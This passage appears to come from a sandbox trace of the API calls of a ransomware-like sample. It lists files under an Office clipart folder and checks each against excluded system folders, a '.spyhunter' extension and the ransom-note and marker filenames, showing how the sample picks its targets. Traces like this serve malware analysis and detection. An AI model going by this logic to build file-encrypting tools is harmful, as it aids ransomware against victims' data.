lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.937] lstrcmpiW (lpString1="AN00790_.WMF", lpString2="Windows") returned -1 [0096.937] lstrlenW (lpString="Windows") returned 7 [0096.937] lstrcmpiW (lpString1="AN00790_.WMF", lpString2="$Recycle.bin") returned 1 [0096.937] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.937] lstrcmpiW (lpString1="AN00790_.WMF", lpString2="System Volume Information") returned -1 [0096.937] lstrlenW (lpString="System Volume Information") returned 25 [0096.937] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 67 [0096.937] StrStrIW (lpFirst="AN00790_.WMF", lpSrch=".spyhunter") returned 0x0 [0096.937] lstrcmpW (lpString1="AN00790_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.937] lstrcmpW (lpString1="AN00790_.WMF", lpString2="_uninstalling_.png") returned 1 [0096.937] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 67 [0096.937] GetProcessHeap () returned 0x2c0000 [0096.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x349850 [0096.937] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15d0) returned 0x2c310e0 [0096.937] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.937] lstrcmpiW (lpString1="AN00853_.WMF", lpString2="Windows") returned -1 [0096.937] lstrlenW (lpString="Windows") returned 7 [0096.937] lstrcmpiW (lpString1="AN00853_.WMF", lpString2="$Recycle.bin") returned 1 [0096.937] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.937] lstrcmpiW (lpString1="AN00853_.WMF", lpString2="System Volume Information") returned -1 [0096.937] lstrlenW (lpString="System Volume Information") returned 25 [0096.938] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 67 [0096.938] StrStrIW (lpFirst="AN00853_.WMF", lpSrch=".spyhunter") returned 0x0 [0096.938] lstrcmpW (lpString1="AN00853_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.938] lstrcmpW (lpString1="AN00853_.WMF", lpString2="_uninstalling_.png") returned 1 [0096.938] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 67 [0096.938] GetProcessHeap () returned 0x2c0000 [0096.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x349920 [0096.938] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15d8) returned 0x2c310e0 [0096.938] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.938] lstrcmpiW (lpString1="AN00914_.WMF", lpString2="Windows") returned -1 [0096.938] lstrlenW (lpString="Windows") returned 7 [0096.938] lstrcmpiW (lpString1="AN00914_.WMF", lpString2="$Recycle.bin") returned 1 [0096.938] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.938] lstrcmpiW (lpString1="AN00914_.WMF", lpString2="System Volume Information") returned -1 [0096.938] lstrlenW (lpString="System Volume Information") returned 25 [0096.938] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 67 [0096.938] StrStrIW (lpFirst="AN00914_.WMF", lpSrch=".spyhunter") returned 0x0 [0096.938] lstrcmpW (lpString1="AN00914_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.938] lstrcmpW (lpString1="AN00914_.WMF", lpString2="_uninstalling_.png") returned 1 [0096.938] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 67 [0096.938] GetProcessHeap () returned 0x2c0000 [0096.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x3499f0 [0096.938] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15e0) returned 0x2c310e0 [0096.938] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.938] lstrcmpiW (lpString1="AN00932_.WMF", lpString2="Windows") returned -1 [0096.938] lstrlenW (lpString="Windows") returned 7 [0096.938] lstrcmpiW (lpString1="AN00932_.WMF", lpString2="$Recycle.bin") returned 1 [0096.938] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.938] lstrcmpiW (lpString1="AN00932_.WMF", lpString2="System Volume Information") returned -1 [0096.939] lstrlenW (lpString="System Volume Information") returned 25 [0096.939] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 67 [0096.939] StrStrIW (lpFirst="AN00932_.WMF", lpSrch=".spyhunter") returned 0x0 [0096.939] lstrcmpW (lpString1="AN00932_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.939] lstrcmpW (lpString1="AN00932_.WMF", lpString2="_uninstalling_.png") returned 1 [0096.939] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 67 [0096.939] GetProcessHeap () returned 0x2c0000 [0096.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x349ac0 [0096.939] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15e8) returned 0x2c310e0 [0096.939] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.939] lstrcmpiW (lpString1="AN00965_.WMF", lpString2="Windows") returned -1 [0096.939] lstrlenW (lpString="Windows") returned 7 [0096.939] lstrcmpiW (lpString1="AN00965_.WMF", lpString2="$Recycle.bin") returned 1 [0096.939] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.939] lstrcmpiW (lpString1="AN00965_.WMF", lpString2="System Volume Information") returned -1 [0096.939] lstrlenW (lpString="System Volume Information") returned 25 [0096.939] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 67 [0096.939] StrStrIW (lpFirst="AN00965_.WMF", lpSrch=".spyhunter") returned 0x0 [0096.939] lstrcmpW (lpString1="AN00965_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.939] lstrcmpW (lpString1="AN00965_.WMF", lpString2="_uninstalling_.png") returned 1 [0096.939] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 67 [0096.939] GetProcessHeap () returned 0x2c0000 [0096.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x349b90 [0096.939] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15f0) returned 0x2c310e0 [0096.939] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.939] lstrcmpiW (lpString1="AN01039_.WMF", lpString2="Windows") returned -1 [0096.940] lstrlenW (lpString="Windows") returned 7 [0096.940] lstrcmpiW (lpString1="AN01039_.WMF", lpString2="$Recycle.bin") returned 1 [0096.940] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.940] lstrcmpiW (lpString1="AN01039_.WMF", lpString2="System Volume Information") returned -1 [0096.940] lstrlenW (lpString="System Volume Information") returned 25 [0096.940] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 67 [0096.940] StrStrIW (lpFirst="AN01039_.WMF", lpSrch=".spyhunter") returned 0x0 [0096.940] lstrcmpW (lpString1="AN01039_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.940] lstrcmpW (lpString1="AN01039_.WMF", lpString2="_uninstalling_.png") returned 1 [0096.940] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 67 [0096.940] GetProcessHeap () returned 0x2c0000 [0096.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x349c60 [0096.940] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15f8) returned 0x2c310e0 [0096.940] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.941] lstrcmpiW (lpString1="AN01044_.WMF", lpString2="Windows") returned -1 [0096.941] lstrlenW (lpString="Windows") returned 7 [0096.941] lstrcmpiW (lpString1="AN01044_.WMF", lpString2="$Recycle.bin") returned 1 [0096.941] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.941] lstrcmpiW (lpString1="AN01044_.WMF", lpString2="System Volume Information") returned -1 [0096.941] lstrlenW (lpString="System Volume Information") returned 25 [0096.941] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 67 [0096.941] StrStrIW (lpFirst="AN01044_.WMF", lpSrch=".spyhunter") returned 0x0 [0096.941] lstrcmpW (lpString1="AN01044_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.941] lstrcmpW (lpString1="AN01044_.WMF", lpString2="_uninstalling_.png") returned 1 [0096.941] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 67 [0096.941] GetProcessHeap () returned 0x2c0000 [0096.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x349d30 [0096.941] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1600) returned 0x2c310e0 [0096.941] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.941] lstrcmpiW (lpString1="AN01060_.WMF", lpString2="Windows") returned -1 [0096.941] lstrlenW (lpString="Windows") returned 7 [0096.941] lstrcmpiW (lpString1="AN01060_.WMF", lpString2="$Recycle.bin") returned 1 [0096.941] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.941] lstrcmpiW (lpString1="AN01060_.WMF", lpString2="System Volume Information") returned -1 [0096.941] lstrlenW (lpString="System Volume Information") returned 25 [0096.941] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 67 [0096.941] StrStrIW (lpFirst="AN01060_.WMF", lpSrch=".spyhunter") returned 0x0 [0096.941] lstrcmpW (lpString1="AN01060_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.941] lstrcmpW (lpString1="AN01060_.WMF", lpString2="_uninstalling_.png") returned 1 [0096.941] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 67 [0096.941] GetProcessHeap () returned 0x2c0000 [0096.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x349e00 [0096.941] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1608) returned 0x2c310e0 [0096.941] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.942] lstrcmpiW (lpString1="AN01084_.WMF", lpString2="Windows") returned -1 [0096.942] lstrlenW (lpString="Windows") returned 7 [0096.942] lstrcmpiW (lpString1="AN01084_.WMF", lpString2="$Recycle.bin") returned 1 [0096.942] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.942] lstrcmpiW (lpString1="AN01084_.WMF", lpString2="System Volume Information") returned -1 [0096.942] lstrlenW (lpString="System Volume Information") returned 25 [0096.942] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 67 [0096.942] StrStrIW (lpFirst="AN01084_.WMF", lpSrch=".spyhunter") returned 0x0 [0096.942] lstrcmpW (lpString1="AN01084_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.942] lstrcmpW (lpString1="AN01084_.WMF", lpString2="_uninstalling_.png") returned 1 [0096.942] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 67 [0096.942] GetProcessHeap () returned 0x2c0000 [0096.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x349ed0 [0096.942] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1610) returned 0x2c310e0 [0096.942] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.942] lstrcmpiW (lpString1="AN01173_.WMF", lpString2="Windows") returned -1 [0096.942] lstrlenW (lpString="Windows") returned 7 [0096.942] lstrcmpiW (lpString1="AN01173_.WMF", lpString2="$Recycle.bin") returned 1 [0096.942] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.942] lstrcmpiW (lpString1="AN01173_.WMF", lpString2="System Volume Information") returned -1 [0096.942] lstrlenW (lpString="System Volume Information") returned 25 [0096.942] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 67 [0096.942] StrStrIW (lpFirst="AN01173_.WMF", lpSrch=".spyhunter") returned 0x0 [0096.942] lstrcmpW (lpString1="AN01173_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.942] lstrcmpW (lpString1="AN01173_.WMF", lpString2="_uninstalling_.png") returned 1 [0096.942] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 67 [0096.942] GetProcessHeap () returned 0x2c0000 [0096.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x349fa0 [0096.942] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1618) returned 0x2c310e0 [0096.942] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.943] lstrcmpiW (lpString1="AN01174_.WMF", lpString2="Windows") returned -1 [0096.943] lstrlenW (lpString="Windows") returned 7 [0096.943] lstrcmpiW (lpString1="AN01174_.WMF", lpString2="$Recycle.bin") returned 1 [0096.943] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.943] lstrcmpiW (lpString1="AN01174_.WMF", lpString2="System Volume Information") returned -1 [0096.943] lstrlenW (lpString="System Volume Information") returned 25 [0096.943] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 67 [0096.943] StrStrIW (lpFirst="AN01174_.WMF", lpSrch=".spyhunter") returned 0x0 [0096.943] lstrcmpW (lpString1="AN01174_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.943] lstrcmpW (lpString1="AN01174_.WMF", lpString2="_uninstalling_.png") returned 1 [0096.943] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 67 [0096.943] GetProcessHeap () returned 0x2c0000 [0096.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34a070 [0096.943] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1620) returned 0x2c310e0 [0096.943] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.943] lstrcmpiW (lpString1="AN01184_.WMF", lpString2="Windows") returned -1 [0096.943] lstrlenW (lpString="Windows") returned 7 [0096.943] lstrcmpiW (lpString1="AN01184_.WMF", lpString2="$Recycle.bin") returned 1 [0096.943] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.943] lstrcmpiW (lpString1="AN01184_.WMF", lpString2="System Volume Information") returned -1 [0096.943] lstrlenW (lpString="System Volume Information") returned 25 [0096.943] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 67 [0096.943] StrStrIW (lpFirst="AN01184_.WMF", lpSrch=".spyhunter") returned 0x0 [0096.943] lstrcmpW (lpString1="AN01184_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.943] lstrcmpW (lpString1="AN01184_.WMF", lpString2="_uninstalling_.png") returned 1 [0096.943] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 67 [0096.943] GetProcessHeap () returned 0x2c0000 [0096.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34a140 [0096.943] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1628) returned 0x2c310e0 [0096.944] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.944] lstrcmpiW (lpString1="AN01216_.WMF", lpString2="Windows") returned -1 [0096.944] lstrlenW (lpString="Windows") returned 7 [0096.944] lstrcmpiW (lpString1="AN01216_.WMF", lpString2="$Recycle.bin") returned 1 [0096.944] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.945] lstrcmpiW (lpString1="AN01216_.WMF", lpString2="System Volume Information") returned -1 [0096.945] lstrlenW (lpString="System Volume Information") returned 25 [0096.945] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 67 [0096.945] StrStrIW (lpFirst="AN01216_.WMF", lpSrch=".spyhunter") returned 0x0 [0096.945] lstrcmpW (lpString1="AN01216_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.945] lstrcmpW (lpString1="AN01216_.WMF", lpString2="_uninstalling_.png") returned 1 [0096.945] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 67 [0096.945] GetProcessHeap () returned 0x2c0000 [0096.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34a210 [0096.945] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1630) returned 0x2c310e0 [0096.945] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.945] lstrcmpiW (lpString1="AN01218_.WMF", lpString2="Windows") returned -1 [0096.945] lstrlenW (lpString="Windows") returned 7 [0096.945] lstrcmpiW (lpString1="AN01218_.WMF", lpString2="$Recycle.bin") returned 1 [0096.945] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.945] lstrcmpiW (lpString1="AN01218_.WMF", lpString2="System Volume Information") returned -1 [0096.945] lstrlenW (lpString="System Volume Information") returned 25 [0096.945] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 67 [0096.945] StrStrIW (lpFirst="AN01218_.WMF", lpSrch=".spyhunter") returned 0x0 [0096.945] lstrcmpW (lpString1="AN01218_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.945] lstrcmpW (lpString1="AN01218_.WMF", lpString2="_uninstalling_.png") returned 1 [0096.945] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 67 [0096.945] GetProcessHeap () returned 0x2c0000 [0096.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34a2e0 [0096.945] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1638) returned 0x2c310e0 [0096.946] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.946] lstrcmpiW (lpString1="AN01251_.WMF", lpString2="Windows") returned -1 [0096.946] lstrlenW (lpString="Windows") returned 7 [0096.946] lstrcmpiW (lpString1="AN01251_.WMF", lpString2="$Recycle.bin") returned 1 [0096.946] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.946] lstrcmpiW (lpString1="AN01251_.WMF", lpString2="System Volume Information") returned -1 [0096.946] lstrlenW (lpString="System Volume Information") returned 25 [0096.946] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 67 [0096.946] StrStrIW (lpFirst="AN01251_.WMF", lpSrch=".spyhunter") returned 0x0 [0096.946] lstrcmpW (lpString1="AN01251_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.946] lstrcmpW (lpString1="AN01251_.WMF", lpString2="_uninstalling_.png") returned 1 [0096.946] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 67 [0096.946] GetProcessHeap () returned 0x2c0000 [0096.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34a3b0 [0096.946] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1640) returned 0x2c310e0 [0096.946] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.946] lstrcmpiW (lpString1="AN01545_.WMF", lpString2="Windows") returned -1 [0096.946] lstrlenW (lpString="Windows") returned 7 [0096.946] lstrcmpiW (lpString1="AN01545_.WMF", lpString2="$Recycle.bin") returned 1 [0096.946] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.946] lstrcmpiW (lpString1="AN01545_.WMF", lpString2="System Volume Information") returned -1 [0096.946] lstrlenW (lpString="System Volume Information") returned 25 [0096.946] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 67 [0096.946] StrStrIW (lpFirst="AN01545_.WMF", lpSrch=".spyhunter") returned 0x0 [0096.946] lstrcmpW (lpString1="AN01545_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.946] lstrcmpW (lpString1="AN01545_.WMF", lpString2="_uninstalling_.png") returned 1 [0096.946] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 67 [0096.947] GetProcessHeap () returned 0x2c0000 [0096.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34a480 [0096.947] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1648) returned 0x2c310e0 [0096.947] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.947] lstrcmpiW (lpString1="AN02122_.WMF", lpString2="Windows") returned -1 [0096.947] lstrlenW (lpString="Windows") returned 7 [0096.947] lstrcmpiW (lpString1="AN02122_.WMF", lpString2="$Recycle.bin") returned 1 [0096.947] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.947] lstrcmpiW (lpString1="AN02122_.WMF", lpString2="System Volume Information") returned -1 [0096.947] lstrlenW (lpString="System Volume Information") returned 25 [0096.947] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 67 [0096.947] StrStrIW (lpFirst="AN02122_.WMF", lpSrch=".spyhunter") returned 0x0 [0096.947] lstrcmpW (lpString1="AN02122_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.947] lstrcmpW (lpString1="AN02122_.WMF", lpString2="_uninstalling_.png") returned 1 [0096.947] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 67 [0096.947] GetProcessHeap () returned 0x2c0000 [0096.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34a550 [0096.947] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1650) returned 0x2c310e0 [0096.947] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.947] lstrcmpiW (lpString1="AN02559_.WMF", lpString2="Windows") returned -1 [0096.947] lstrlenW (lpString="Windows") returned 7 [0096.947] lstrcmpiW (lpString1="AN02559_.WMF", lpString2="$Recycle.bin") returned 1 [0096.947] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.947] lstrcmpiW (lpString1="AN02559_.WMF", lpString2="System Volume Information") returned -1 [0096.947] lstrlenW (lpString="System Volume Information") returned 25 [0096.947] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 67 [0096.947] StrStrIW (lpFirst="AN02559_.WMF", lpSrch=".spyhunter") returned 0x0 [0096.948] lstrcmpW (lpString1="AN02559_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.948] lstrcmpW (lpString1="AN02559_.WMF", lpString2="_uninstalling_.png") returned 1 [0096.948] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 67 [0096.948] GetProcessHeap () returned 0x2c0000 [0096.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34a620 [0096.948] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1658) returned 0x2c310e0 [0096.948] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.948] lstrcmpiW (lpString1="AN02724_.WMF", lpString2="Windows") returned -1 [0096.948] lstrlenW (lpString="Windows") returned 7 [0096.948] lstrcmpiW (lpString1="AN02724_.WMF", lpString2="$Recycle.bin") returned 1 [0096.948] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.948] lstrcmpiW (lpString1="AN02724_.WMF", lpString2="System Volume Information") returned -1 [0096.948] lstrlenW (lpString="System Volume Information") returned 25 [0096.948] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 67 [0096.948] StrStrIW (lpFirst="AN02724_.WMF", lpSrch=".spyhunter") returned 0x0 [0096.948] lstrcmpW (lpString1="AN02724_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.948] lstrcmpW (lpString1="AN02724_.WMF", lpString2="_uninstalling_.png") returned 1 [0096.948] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 67 [0096.948] GetProcessHeap () returned 0x2c0000 [0096.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34a6f0 [0096.948] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1660) returned 0x2c310e0 [0096.948] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.948] lstrcmpiW (lpString1="AN03500_.WMF", lpString2="Windows") returned -1 [0096.948] lstrlenW (lpString="Windows") returned 7 [0096.948] lstrcmpiW (lpString1="AN03500_.WMF", lpString2="$Recycle.bin") returned 1 [0096.948] 